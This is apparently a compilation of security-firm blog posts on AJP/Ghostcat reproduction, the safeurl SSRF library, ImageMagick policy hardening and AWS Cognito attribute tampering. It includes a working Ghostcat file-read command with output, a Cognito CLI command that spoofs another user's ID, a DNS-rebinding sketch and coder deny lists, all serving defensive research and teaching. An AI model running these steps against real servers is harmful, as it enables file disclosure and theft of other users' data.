We feel nothing beats real-world experience in coding and reviewing code for vulnerabilities. Beyond that, the academic knowledge necessary to pass our code review challenge is similar to (but not limited to) what you’d find in the following resources:

Technical Interview

After analyzing the results of the first challenge, we decide whether to invite the candidate to the first technical interview. The interview is usually conducted by our Consulting Director or one of the more experienced consultants.

The interview will last about 45 minutes, during which we will ask questions that help us understand the candidate’s skillset and determine their level of seniority. During this conversation, we will also ask about mistakes made during the source code challenge. We want to understand why someone may have reported a vulnerability when it is not there or perhaps why someone missed a particular, easy to detect vulnerability.

We also encourage candidates to ask questions about how we work, what tools and techniques we use and anything else that may interest the candidate.

The knowledge necessary to be successful in this phase of the process comes from real-world experience, coupled with academic knowledge from sources such as these:

Web Challenge

At four hours in length, our Web Challenge is our last and longest test of technical skills. At an agreed upon time, we send the candidate a link to a web application that contains a certain number of vulnerabilities and the candidate’s task is to find as many vulnerabilities as possible and prepare a simplified report. Unlike the previous technical challenge where we checked the ability to read the source code, this is a 100% blackbox test.

We recommend that candidates feel comfortable with topics similar to those covered in the PortSwigger Web Security Academy, or the training/CTFs available through sites such as HackerOne, prior to attempting this challenge.

If the candidate passes this stage of the recruitment process, they will only have one last stage, an interview with the founders of the company.

Final Interview

The last stage of recruitment isn’t so much an interview as a summary of the entire process. We want to talk to the candidate about their strengths, better understand their technical weaknesses and discuss any mistakes they made during the previous steps in the process. In particular, we always like to distinguish errors that stem from a lack of knowledge from those that are the result of time pressure. It’s a very positive sign when candidates who reach this stage have reflected upon the process and taken steps to improve in any areas they felt less comfortable with.

The last interview is always carried out by one of the founders of the company, so it’s a great opportunity to learn more about Doyensec. If someone reaches this stage of the recruitment process, it is highly likely that our company will make them an offer. Our offers are based on their expectations as well as what value they bring to the organization. The entire recruitment process is meant to guarantee that the employee will be satisfied with the work and meet the high standards Doyensec has for its team.

The entire recruitment process takes about 8 hours of actual time, which is only one working day in total. So, if the candidate is responsive, the entire recruitment process can usually be completed in about 2 weeks or less.

If you are looking for more information about working @Doyensec, visit our career page and check out our job openings.

Summary Recruiting Process

Let's speak AJP

14 November 2022 at 23:00

Introduction

AJP (Apache JServ Protocol) is a binary protocol developed in 1997 with the goal of improving the performance of the traditional HTTP/1.1 protocol, especially when proxying HTTP traffic between a web server and a J2EE container. It was originally created to efficiently manage network throughput while forwarding requests from server A to server B.

A typical use case for this protocol is shown below: AJP schema

During one of my recent research weeks at Doyensec, I studied and analyzed how this protocol works and how it is implemented within some popular web servers and Java containers. The research also aimed at reproducing the infamous Ghostcat (CVE-2020-1938) vulnerability discovered in Tomcat by Chaitin Tech researchers, and potentially discovering other look-alike bugs.

Ghostcat

This vulnerability affected the AJP connector component of the Apache Tomcat Java servlet container, allowing malicious actors to perform local file inclusion from the application root directory. In some circumstances, this issue would allow attackers to perform arbitrary command execution. For more details about Ghostcat, please refer to the following blog post: https://hackmag.com/security/apache-tomcat-rce/

Communicating via AJP

Back in 2017, our own Luca Carettoni developed and released one of the first, if not the first, open source libraries implementing the Apache JServ Protocol version 1.3 (ajp13). With that, he also developed AJPFuzzer. Essentially, this is a rudimentary fuzzer that makes it easy to send handcrafted AJP messages, run message mutations, test directory traversals and fuzz arbitrary elements within the packet.

With minor tuning, AJPFuzzer can be also used to quickly reproduce the GhostCat vulnerability. In fact, we’ve successfully reproduced the attack by sending a crafted forwardrequest request including the javax.servlet.include.servlet_path and javax.servlet.include.path_info Java attributes, as shown below:

$ java -jar ajpfuzzer_v0.7.jar

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

Once connected to the target host, send the malicious ForwardRequest packet message and verify the disclosure of the test.xml file:

$ AJPFuzzer/192.168.80.131:8009> forwardrequest 2 "HTTP/1.1" "/" 127.0.0.1 192.168.80.131 192.168.80.131 8009 false "Cookie:test=value" "javax.servlet.include.path_info:/WEB-INF/test.xml,javax.servlet.include.servlet_path:/"


[*] Sending Test Case '(2) forwardrequest'
[*] 2022-10-13 23:02:45.648


... trimmed ...


[*] Received message type 'Send Body Chunk'
[*] Received message description 'Send a chunk of the body from the servlet container to the web server.
Content (HEX):
0x3C68656C6C6F3E646F79656E7365633C2F68656C6C6F3E0A
Content (Ascii):
<hello>doyensec</hello>
'
[*] 2022-10-13 23:02:46.859


00000000 41 42 00 1C 03 00 18 3C 68 65 6C 6C 6F 3E 64 6F AB.....<hello>do
00000010 79 65 6E 73 65 63 3C 2F 68 65 6C 6C 6F 3E 0A 00 yensec</hello>..


[*] Received message type 'End Response'
[*] Received message description 'Marks the end of the response (and thus the request-handling cycle). Reuse? Yes'
[*] 2022-10-13 23:02:46.86

The server AJP connector will receive an AJP message with the following structure:

AJP schema wireshark

The combination of libajp13, AJPFuzzer and the Wireshark AJP13 dissector made it easier to understand the protocol and play with it. For example, another noteworthy test case in AJPFuzzer is named genericfuzz. By using this command, it’s possible to perform fuzzing on arbitrary elements within the AJP request, such as the request attributes name/value, secret, cookies name/value, request URI path and much more:

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

$ AJPFuzzer/192.168.80.131:8009> genericfuzz 2 "HTTP/1.1" "/" "127.0.0.1" "127.0.0.1" "127.0.0.1" 8009 false "Cookie:AAAA=BBBB" "secret:FUZZ" /tmp/listFUZZ.txt

AJP schema fuzz
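For readers who want to poke at the protocol by hand, here is a hedged Go sketch of a raw CPing/CPong exchange (client packets start with the magic bytes 0x12 0x34 and a two-byte payload length; CPing is message type 10, and the container should answer with an “AB”-prefixed CPong, type 9):

package main

import (
	"fmt"
	"net"
)

func main() {
	conn, err := net.Dial("tcp", "192.168.80.131:8009")
	if err != nil {
		panic(err)
	}
	defer conn.Close()

	// AJP13 packet: 0x12 0x34 magic, payload length 1, CPing (0x0A)
	cping := []byte{0x12, 0x34, 0x00, 0x01, 0x0A}
	if _, err := conn.Write(cping); err != nil {
		panic(err)
	}

	// Expect "AB", length 0x0001 and CPong (0x09) from the container
	reply := make([]byte, 5)
	if _, err := conn.Read(reply); err != nil {
		panic(err)
	}
	fmt.Printf("% x\n", reply)
}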

Takeaways

Web binary protocols are fun to learn and reverse engineer.

For defenders:

  • Do not expose your AJP interfaces in hostile networks. Instead, consider switching to HTTP/2
  • Protect the AJP interface by enabling a shared secret. In this case, the workers must also include a matching value for the secret

safeurl for Go

12 December 2022 at 23:00

Do you need a Go HTTP library to protect your applications from SSRF attacks? If so, try safeurl. It’s a one-line drop-in replacement for Go’s net/http client.

No More SSRF in Go Web Apps

When building a web application, it is not uncommon to issue HTTP requests to internal microservices or even external third-party services. Whenever a URL is provided by the user, it is important to ensure that Server-Side Request Forgery (SSRF) vulnerabilities are properly mitigated. As eloquently described in PortSwigger’s Web Security Academy pages, SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

While libraries mitigating SSRF exist in numerous programming languages, Go didn’t have an easy-to-use solution. Until now!

safeurl for Go is a library with built-in SSRF and DNS rebinding protection that can easily replace Go’s default net/http client. All the heavy work of parsing, validating and issuing requests is done by the library. The library works out-of-the-box with minimal configuration, while providing developers the customizations and filtering options they might need. Instead of fighting to solve application security problems, developers should be free to focus on delivering quality features to their customers.

This library was inspired by SafeCURL and SafeURL, respectively by Jack Whitton and Include Security. Since no SafeURL for Go existed, Doyensec made it available for the community.

What Does safeurl Offer?

With minimal configuration, the library prevents unauthorized requests to internal, private or reserved IP addresses. All HTTP connections are validated against an allowlist and a blocklist. By default, the library blocks all traffic to private or reserved IP addresses, as defined by RFC1918. This behavior can be updated via safeurl’s client configuration. The library will give precedence to allowed items, be it a hostname, an IP address or a port. In general, allowlisting is the recommended way of building secure systems. In fact, it’s easier (and safer) to explicitly set allowed destinations, as opposed to having to deal with updating a blocklist in today’s ever-expanding threat landscape.

Installation

Include the safeurl module in your Go program by simply adding github.com/doyensec/safeurl to your project’s go.mod file.

go get -u github.com/doyensec/safeurl

Usage

The safeurl.Client, provided by the library, can be used as a drop-in replacement of Go’s native net/http.Client.

The following code snippet shows a simple Go program that uses the safeurl library:

import (
    "fmt"
    "github.com/doyensec/safeurl"
)

func main() {
    config := safeurl.GetConfigBuilder().
        Build()

    client := safeurl.Client(config)

    resp, err := client.Get("https://example.com")
    if err != nil {
        fmt.Errorf("request return error: %v", err)
    }

    // read response body
}

The minimal library configuration looks something like:

config := GetConfigBuilder().Build()

Using this configuration you get:

  • allowed traffic only for ports 80 and 443
  • allowed traffic which uses HTTP or HTTPS protocols
  • blocked traffic to private IP addresses
  • blocked IPv6 traffic to any address
  • mitigation for DNS rebinding attacks

Configuration

The safeurl.Config is used to customize the safeurl.Client. The configuration can be used to set the following:

AllowedPorts            - list of ports the application can connect to
AllowedSchemes          - list of schemas the application can use
AllowedHosts            - list of hosts the application is allowed to communicate with
BlockedIPs              - list of IP addresses the application is not allowed to connect to
AllowedIPs              - list of IP addresses the application is allowed to connect to
AllowedCIDR             - list of CIDR range the application is allowed to connect to
BlockedCIDR             - list of CIDR range the application is not allowed to connect to
IsIPv6Enabled           - specifies whether communication through IPv6 is enabled
AllowSendingCredentials - specifies whether HTTP credentials should be sent
IsDebugLoggingEnabled   - enables debug logs

Being a wrapper around Go’s native net/http.Client, the library allows you to configure other standard settings as well, such as HTTP redirects, cookie jar settings and request timeouts. Please refer to the official docs for more information on the suggested configuration for production environments.

Configuration examples

To showcase how versatile safeurl.Client is, let us show you a few configuration examples.

It is possible to allow only a single schema:

GetConfigBuilder().
    SetAllowedSchemes("http").
    Build()

Or configure one or more allowed ports:

// This enables only port 8080. All others are blocked (80, 443 are blocked too)
GetConfigBuilder().
    SetAllowedPorts(8080).
    Build()

// This enables only port 8080, 443, 80
GetConfigBuilder().
    SetAllowedPorts(8080, 80, 443). 
    Build()

// Incorrect. Each call overwrites the previous one, so only the last allowed port (443) takes effect
GetConfigBuilder().
    SetAllowedPorts(8080).
    SetAllowedPorts(80).
    SetAllowedPorts(443).
    Build()

This configuration allows traffic to only one host, example.com in this case:

GetConfigBuilder().
    SetAllowedHosts("example.com").
    Build()

Additionally, you can block specific IPs (IPv4 or IPv6):

GetConfigBuilder().
    SetBlockedIPs("1.2.3.4").
    Build()

Note that with the previous configuration, the safeurl.Client will block the IP 1.2.3.4 in addition to all IPs belonging to internal, private or reserved networks.

If you wish to allow traffic to an IP address, which the client blocks by default, you can use the following configuration:

GetConfigBuilder().
    SetAllowedIPs("10.10.100.101").
    Build()

It’s also possible to allow or block full CIDR ranges instead of single IPs:

GetConfigBuilder().
    EnableIPv6(true).
    SetBlockedIPsCIDR("34.210.62.0/25", "216.239.34.0/25", "2001:4860:4860::8888/32").
    Build()

DNS Rebinding mitigation

DNS rebinding attacks are possible due to a mismatch in the DNS responses between two (or more) consecutive HTTP requests. This vulnerability is a typical TOCTOU problem. At the time-of-check (TOC), the IP points to an allowed destination. However, at the time-of-use (TOU), it will point to a completely different IP address.
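To illustrate, here is a hedged sketch of the naive validate-then-fetch pattern that rebinding abuses (isPrivate is a hypothetical helper standing in for an RFC1918/loopback check; the hostname is a placeholder):

package main

import (
	"fmt"
	"net"
	"net/http"
)

// isPrivate is a hypothetical helper checking for private or loopback IPs
func isPrivate(ips []net.IP) bool {
	for _, ip := range ips {
		if ip.IsPrivate() || ip.IsLoopback() {
			return true
		}
	}
	return false
}

func fetch(host string) error {
	// Time-of-check: the attacker's DNS server answers with a harmless
	// public address, so the validation passes
	ips, err := net.LookupIP(host)
	if err != nil || isPrivate(ips) {
		return fmt.Errorf("blocked host: %s", host)
	}
	// Time-of-use: the HTTP client resolves the name again; a rebinding
	// server can now answer with 127.0.0.1 or an internal address
	_, err = http.Get("http://" + host + "/")
	return err
}

func main() {
	fmt.Println(fetch("rebind.attacker.example"))
}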

DNS rebinding protection in safeurl is accomplished by performing the allow/block list validations on the actual IP address which will be used to make the HTTP request. This is achieved by utilizing Go’s net.Dialer and its Control hook. As stated in the official documentation:

// If Control is not nil, it is called after creating the network
// connection but before actually dialing.
Control func(network, address string, c syscall.RawConn) error

In our safeurl implementation, the IPs validation happens inside the Control hook. The following snippet shows some of the checks being performed. If all of them pass, the HTTP dial occurs. In case a check fails, the HTTP request is dropped.

func buildRunFunc(wc *WrappedClient) func(network, address string, c syscall.RawConn) error {

return func(network, address string, _ syscall.RawConn) error {
	// [...]
	if wc.config.AllowedIPs == nil && isIPBlocked(ip, wc.config.BlockedIPs) {
		wc.log(fmt.Sprintf("ip: %v found in blocklist", ip))
		return &AllowedIPError{ip: ip.String()}
	}

	if !isIPAllowed(ip, wc.config.AllowedIPs) && isIPBlocked(ip, wc.config.BlockedIPs) {
		wc.log(fmt.Sprintf("ip: %v not found in allowlist", ip))
		return &AllowedIPError{ip: ip.String()}
	}

	return nil
}
}

Help Us Make safeurl Better (and Safer)

We’ve performed extensive testing during the library development. However, we would love to have others pick at our implementation.

“Given enough eyes, all bugs are shallow”. Hopefully.

Connect to http://164.92.85.153/ and attempt to catch the flag hosted on this internal (and unauthorized) URL: http://164.92.85.153/flag

The challenge was shut down on 01/13/2023. You can always run the challenge locally, by using the code snippet below.

This is the source code of the challenge endpoint, with the specific safeurl configuration:

func main() {
	cfg := safeurl.GetConfigBuilder().
		SetBlockedIPs("164.92.85.153").
		SetAllowedPorts(80, 443).
		Build()

	client := safeurl.Client(cfg)

	router := gin.Default()

	router.GET("/webhook", func(context *gin.Context) {
		urlFromUser := context.Query("url")
		if urlFromUser == "" {
			errorMessage := "Please provide an url. Example: /webhook?url=your-url.com\n"
			context.String(http.StatusBadRequest, errorMessage)
		} else {
			stringResponseMessage := "The server is checking the url: " + urlFromUser + "\n"

			resp, err := client.Get(urlFromUser)

			if err != nil {
				stringError := fmt.Errorf("request return error: %v", err)
				fmt.Print(stringError)
				context.String(http.StatusBadRequest, err.Error())
				return
			}

			defer resp.Body.Close()
			bodyString, err := io.ReadAll(resp.Body)

			if err != nil {
				context.String(http.StatusInternalServerError, err.Error())
				return
			}

			fmt.Print("Response from the server: " + stringResponseMessage)
			fmt.Print(resp)
			context.String(http.StatusOK, string(bodyString))
		}
	})

	router.GET("/flag", func(context *gin.Context) {
		ip := context.RemoteIP()
		nip := net.ParseIP(ip)
		if nip != nil {
			if nip.IsLoopback() {
				context.String(http.StatusOK, "You found the flag")
			} else {
				context.String(http.StatusForbidden, "")
			}
		} else {
			context.String(http.StatusInternalServerError, "")
		}
	})

	router.GET("/", func(context *gin.Context) {

		indexPage := "<!DOCTYPE html><html lang=\"en\"><head><title>SafeURL - challenge</title></head><body>...</body></html>"
		context.Writer.Header().Set("Content-Type", "text/html; charset=UTF-8")
		context.String(http.StatusOK, indexPage)
	})

	router.Run("127.0.0.1:8080")
}


If you are able to bypass the check enforced by the safeurl.Client, the content of the flag will give you further instructions on how to collect your reward. Please note that unintended ways of getting the flag (e.g., not bypassing safeurl.Client) are considered out of scope.

Feel free to contribute with pull requests, bug reports or enhancements ideas.

This tool was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

ImageMagick Security Policy Evaluator

9 January 2023 at 23:00

During our audits we occasionally stumble across ImageMagick security policy configuration files (policy.xml), useful for limiting the default behavior and the resources consumed by the library. In the wild, these files often contain a plethora of recommendations cargo-culted from around the internet. This normally happens for two reasons:

  • Its options are only generally described on the online documentation page of the library, with no clear breakdown of what each security directive allowed by the policy regulates. While the architectural complexity and the granularity of the options definable by the policy are the major obstacles for a newbie, the corresponding knowledge base could be more welcoming. By default, ImageMagick comes with an unrestricted policy that must be tuned by the developers depending on their use case. According to the docs, “this affords maximum utility for ImageMagick installations that run in a sandboxed environment, perhaps in a Docker instance, or behind a firewall where security risks are greatly diminished as compared to a public website.” A secure, strict policy is also made available; however, as noted in the past, it is not always configured correctly.
  • ImageMagick supports over 100 major file formats (not including sub-formats). The infamous vulnerabilities affecting the library over the years produced a number of urgent security fixes and workarounds involving the addition of policy items excluding the affected formats and features (ImageTragick in 2016, @taviso’s RCE via GhostScript in 2018, @insertScript’s shell injection via PDF password in 2020, @alexisdanizan’s in 2021).

Towards safer policies

With this in mind, we decided to study the effects of all the options accepted by ImageMagick’s security policy parser and to write a tool that assists both developers and security teams in designing and auditing these files. Because of the number of available options and the need to explicitly deny all insecure settings, this is usually a manual task, which may miss subtle bypasses that undermine the strength of a policy. It’s also easy to set policies that appear to work but offer no real security benefit. The tool’s checks are based on our research into hardening ImageMagick policies, and aim to make sure that a policy provides a meaningful security benefit and cannot be subverted by attackers.

The tool can be found at imagemagick-secevaluator.doyensec.com/.

Allowlist vs Denylist approach

A number of seemingly secure policies can be found online, specifying a list of insecure coders similar to:

  ...
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="EPI" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="PLT" />
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="PS2" />
  <policy domain="coder" rights="none" pattern="PS3" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="XPS" />
  ...

In ImageMagick 6.9.7-7, an unlisted change was pushed. The policy parser’s behavior changed: instead of disallowing the use of a coder if there was at least one none-permission rule for it in the policy, it now respects the last matching rule in the policy for that coder. This means that it is possible to adopt an allowlist approach in modern policies, first denying rights to all coders and then enabling only the vetted ones. A more secure policy would specify:

  ...
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" />
  <policy domain="coder" rights="read | write" pattern="{GIF,JPEG,PNG,WEBP}" />
  ...

Case sensitivity

Consider the following directive:

  ...
  <policy domain="coder" rights="none" pattern="ephemeral,epi,eps,msl,mvg,pdf,plt,ps,ps2,ps3,show,text,win,xps" />
  ...

With this, conversions will still be allowed, since policy patterns are case-sensitive. Coders and modules must always be upper-cased in the policy (e.g., “EPS”, not “eps”).
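
A working equivalent of the directive above would instead use upper-case patterns:

  ...
  <policy domain="coder" rights="none" pattern="{EPHEMERAL,EPI,EPS,MSL,MVG,PDF,PLT,PS,PS2,PS3,SHOW,TEXT,WIN,XPS}" />
  ...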

Resource limits

Denial of service in ImageMagick is quite easy to achieve. To get a fresh set of payloads, it’s convenient to search for “oom” or similar keywords in the recently opened issues on the GitHub repository of the library. This is an issue, since an ImageMagick instance accepting potentially malicious inputs (which is often the case) will always be prone to exploitation. Because of this, the tool also reports when reasonable limits are not explicitly set by the policy.
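
As a baseline, explicit caps similar to the following (values taken from the starter policy discussed later, to be tuned to the expected workload) mitigate the most common memory and CPU exhaustion payloads:

  ...
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="disk" value="1GiB"/>
  <policy domain="resource" name="time" value="10"/>
  ...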

Policy fragmentation

Once a policy is defined, it’s important to make sure that the policy file is taking effect. ImageMagick packages bundled with the distribution or installed as dependencies through multiple package managers may specify different policies that interfere with each other. A quick find on your local machine will identify multiple occurrences of policy.xml files:

$ find / -iname policy.xml

# Example output on macOS
/usr/local/etc/ImageMagick-7/policy.xml
/usr/local/Cellar/imagemagick@6/6.9.12-60/etc/ImageMagick-6/policy.xml
/usr/local/Cellar/imagemagick@6/6.9.12-60/share/doc/ImageMagick-6/www/source/policy.xml
/usr/local/Cellar/imagemagick/7.1.0-45/etc/ImageMagick-7/policy.xml
/usr/local/Cellar/imagemagick/7.1.0-45/share/doc/ImageMagick-7/www/source/policy.xml

# Example output on Ubuntu
/usr/local/etc/ImageMagick-7/policy.xml
/usr/local/share/doc/ImageMagick-7/www/source/policy.xml
/opt/ImageMagick-7.0.11-5/config/policy.xml
/opt/ImageMagick-7.0.11-5/www/source/policy.xml

Policies can also be configured using the -limit CLI argument, MagickCore API methods, or with environment variables.
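
For instance, the memory cap can also be set for a single invocation or through the environment (a sketch, assuming a standard ImageMagick installation):

$ convert -limit memory 256MiB input.png output.png
$ MAGICK_MEMORY_LIMIT=256MiB convert input.png output.png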

A starter, restrictive policy

Starting from the most restrictive policy described in the official documentation, we designed a restrictive policy gathering all our observations:

<policymap>
  <policy domain="resource" name="temporary-path" value="/mnt/magick-conversions-with-restrictive-permissions"/> <!-- the location should only be accessible to the low-privileged user running ImageMagick -->
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="list-length" value="32"/>
  <policy domain="resource" name="width" value="8KP"/>
  <policy domain="resource" name="height" value="8KP"/>
  <policy domain="resource" name="map" value="512MiB"/>
  <policy domain="resource" name="area" value="16KP"/>
  <policy domain="resource" name="disk" value="1GiB"/>
  <policy domain="resource" name="file" value="768"/>
  <policy domain="resource" name="thread" value="2"/>
  <policy domain="resource" name="time" value="10"/>
  <policy domain="module" rights="none" pattern="*" /> 
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" /> 
  <policy domain="coder" rights="write" pattern="{PNG,JPG,JPEG}" /> <!-- your restricted set of acceptable formats, set your rights needs -->
  <policy domain="filter" rights="none" pattern="*" />
  <policy domain="path" rights="none" pattern="@*"/>
  <policy domain="cache" name="memory-map" value="anonymous"/>
  <policy domain="cache" name="synchronize" value="true"/>
  <!-- <policy domain="cache" name="shared-secret" value="my-secret-passphrase" stealth="True"/> Only needed for distributed pixel cache spanning multiple servers -->
  <policy domain="system" name="shred" value="2"/>
  <policy domain="system" name="max-memory-request" value="256MiB"/>
  <policy domain="resource" name="throttle" value="1"/> <!-- Periodically yield the CPU for at least the time specified in ms -->
  <policy domain="system" name="precision" value="6"/>
</policymap>

You can verify that a security policy is active using the identify command:

identify -list policy
Path: ImageMagick/policy.xml
...

You can also play with the above policy using our evaluator tool while developing a tailored one.

Tampering User Attributes In AWS Cognito User Pools

23 January 2023 at 23:00

CloudsecTidbit

From The Previous Episode… Did you solve the CloudSecTidbit Ep. 1 IaC lab?

Solution

The challenge for the data-import CloudSecTidbit is basically reading the content of an internal bucket. The frontend web application is using the targeted bucket to store the logo of the app.

The name of the bucket is returned to the client by calling the /variable endpoint:

$.ajax({
    type: 'GET',
    url: '/variable',
    dataType: 'json',
    success: function (data) {
        let source_internal = `https://${data}.s3.amazonaws.com/public-stuff/logo.png?${Math.random()}`;
        $(".logo_image").attr("src", source_internal);
    },
    error: function (jqXHR, status, err) {
        alert("Error getting variable name");
    }
});

The server will return something like:

"data-internal-private-20220705153355922300000001"

So the schema should be clear now. Let’s use the data import functionality and try to leak the content of the data-internal-private S3 bucket:

Extracting data from the internal S3 bucket

Then, by visiting the Data Gallery section, you will see the keys.txt and dummy.txt objects, which are stored within the internal bucket.

Tidbit No. 2 - Tampering User Attributes In AWS Cognito User Pools

Amazon Web Services offers a complete solution to add user sign-up, sign-in, and access control to web and mobile applications: Cognito. Let’s first talk about the service in general terms.

From AWS Cognito’s welcome page:

“Using the Amazon Cognito user pools API, you can create a user pool to manage directories and users. You can authenticate a user to obtain tokens related to user identity and access policies.”

Amazon Cognito collects a user’s profile attributes into directories called pools that an application uses to handle all authentication related tasks.

Pool Types

The two main components of Amazon Cognito are:

  • User pools: Provide sign-up and sign-in options for app users along with attributes association for each user.
  • Identity pools: Provide the possibility to grant users access to other AWS services (e.g., DynamoDB or Amazon S3).

With a user pool, users can sign in to an app through Amazon Cognito, OAuth2, and SAML identity providers.

Each user has a profile that applications can access through the software development kit (SDK).

User Attributes

User attributes are pieces of information stored to characterize individual users, such as name, email address, and phone number. A new user pool has a set of default standard attributes. It is also possible to add custom attributes to satisfy custom needs.

App Clients & Authentication

An app is an entity within a user pool that has permission to call management operation APIs, such as those used for user registration, sign-in, and forgotten passwords.

In order to call the operation APIs, an app client ID and an optional client secret are needed. Multiple app integrations can be created for a single user pool, but typically, an app client corresponds to the platform of an app.

A user can be authenticated in different ways using Cognito, but the main options are:

  • Client-side authentication flow - Used in client-side apps to obtain a valid session token (JWT) directly from the pool;
  • Server-side authentication flow - Used in server-side app with the authenticated server-side API for Amazon Cognito user pools. The server-side app calls the AdminInitiateAuth API operation. This operation requires AWS credentials with permissions that include cognito-idp:AdminInitiateAuth and cognito-idp:AdminRespondToAuthChallenge. The operation returns the required authentication parameters.

In both cases, the end user receives the resulting JSON Web Token.
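
As an illustration, the server-side flow can be exercised with the AWS CLI using properly privileged AWS credentials (the pool ID, client ID and user values below are placeholders):

$ aws cognito-idp admin-initiate-auth \
    --user-pool-id us-east-1_EXAMPLE \
    --client-id 1example23456789 \
    --auth-flow ADMIN_USER_PASSWORD_AUTH \
    --auth-parameters USERNAME=user@example.com,PASSWORD=example-password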

With this first look at the service complete, we can jump straight to the tidbit case.

Unrestricted User Attributes Write in AWS Cognito User Pool - The Third-party Users Mapping Case

For this case, we will focus on a vulnerability identified in a Web Platform that was using AWS Cognito.

The platform used Cognito to manage users and map them to their accounts in a third-party platform, X_platform, strictly interconnected with the provided service.

In particular, users were able to connect their X_platform account and allow the platform to fetch their X_platform data for later use. The decoded Cognito access token issued for a platform user contained the following claims:

{
  "sub": "cf9..[REDACTED]",
  "device_key": "us-east-1_ab..[REDACTED]",
  "iss": "https://cognito-idp.us-east-1.amazonaws.com/us-east-1_..[REDACTED]",
  "client_id": "9..[REDACTED]",
  "origin_jti": "ab..[REDACTED]",
  "event_id": "d..[REDACTED]",
  "token_use": "access",
  "scope": "aws.cognito.signin.user.admin",
  "auth_time": [REDACTED],
  "exp": [REDACTED],
  "iat": [REDACTED],
  "jti": "3b..[REDACTED]",
  "username": "[REDACTED]"
}

In AWS Cognito, user access tokens permit calls to all the User Pool API operations that can be invoked with an access token alone.

The permitted API definitions can be found here.

If the request syntax for the API call includes the parameter "AccessToken": "string", then the operation allows users to modify their own user pool entry with the previously inspected JWT.

The design described above does not represent a vulnerability on its own, but letting users edit their own User Attributes in the pool can lead to severe impact if the backend uses them to apply internal platform logic.

The data associated with the user within the pool was fetched using the AWS CLI:

$ aws cognito-idp get-user --region us-east-1 --access-token eyJra..[REDACTED SESSION JWT]
{
    "Username": "[REDACTED]",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "cf915…[REDACTED]"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "[REDACTED]"
        },
        {
            "Name": "custom:X_platform_user_id",
            "Value": "[REDACTED ID]"
        },
        {
            "Name": "email",
            "Value": "[REDACTED]"
        }
    ]
}

The Simple Deduction

After finding the X_platform_user_id user pool attribute, it was clear that it was there for a specific purpose. In fact, the platform was fetching the attribute to use it as the primary key to query the associated refresh_token in an internal database.

Attempting to spoof the attribute was as simple as executing:

$ aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:X_platform_user_id,Value=[ANOTHER REDACTED ID]" --access-token eyJra..[REDACTED SESSION JWT]

The attribute edit succeeded and the data from the other user started to flow into the attacker’s account. The platform trusted the attribute as immutable and used it to retrieve a refresh_token needed to fetch and show data from X_platform in the UI.

Point Of The Story - Default READ/WRITE Perms On User Attributes

In AWS Cognito, App Integrations (Clients) have default read/write permissions on User Attributes.

The following image shows the “Attribute read and write permissions” configuration for a new App Integration within a User Pool.

Consequently, authenticated users are able to edit their own attributes by using the access token (JWT) and AWS CLI.

In conclusion, it is very important to be aware of this behavior and to set the permissions correctly during pool creation. Depending on the platform logic, some attributes should be set as read-only so that internal flows can trust them.

For cloud security auditors

While auditing cloud-driven web platforms, look for JWTs issued by AWS Cognito, then answer the following questions:

  • Which User Attributes are associated with the user pool?
  • Which ones are editable with the JWT directly via AWS CLI?
    • Among the editable ones, is the platform trusting such claims?
      • For what internal logic or functional flow?
      • How does editing affect the business logic?

For developers

Remove write permissions for every platform-critical user attribute within the App Integrations (Clients) of the AWS Cognito User Pool in use.

By removing them, users will not be able to perform attribute updates using their access tokens.

Updates will be possible only via admin actions such as the admin-update-user-attributes method, which requires AWS credentials.
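
For reference, a minimal admin-side update looks like the following (identifiers are placeholders). Note that it requires AWS credentials with the appropriate cognito-idp permissions rather than the user’s access token:

$ aws cognito-idp admin-update-user-attributes \
    --user-pool-id us-east-1_EXAMPLE \
    --username target-username \
    --user-attributes Name=custom:X_platform_user_id,Value=LEGITIMATE_ID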

+1 remediation tip: To avoid doing it by hand, apply the r/w config in your IaC and have the infrastructure correctly deployed. Terraform example:

resource "aws_cognito_user_pool" "my_pool" {
  name = "my_pool"
}

...

resource "aws_cognito_user_pool" "pool" {
  name = "pool"
}

resource "aws_cognito_user_pool_client" "client" {
  name = "client"

  user_pool_id = aws_cognito_user_pool.pool.id
  read_attributes = ["email"]
  write_attributes = ["email"]
}

The given Terraform example file will create a pool where the client will have only read/write permissions on the “email” attribute. In fact, if at least one attribute is specified either in the read_attributes or write_attributes lists, the default r/w policy will be ignored.

By doing so, it is possible to strictly specify the attributes with read/write permissions while implicitly denying them on the non-specified ones.

Please also ensure that email and phone number verification is properly handled in the Cognito context. Since these attributes may contain unverified values, remember to apply the AttributesRequireVerificationBeforeUpdate parameter.

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!


Introducing Proxy Enriched Sequence Diagrams (PESD)

13 February 2023 at 23:00

PESD Exporter is now public!

We are releasing an internal tool to speed up testing and reporting efforts in complex functional flows. We’re excited to announce that PESD Exporter is now available on Github.

pesdExporter

Modern web platform design involves integrations with other applications and cloud services to add functionalities, share data and enrich the user experience. The resulting functional flows are characterized by multiple state-changing steps with complex trust boundaries and responsibility separation among the involved actors.

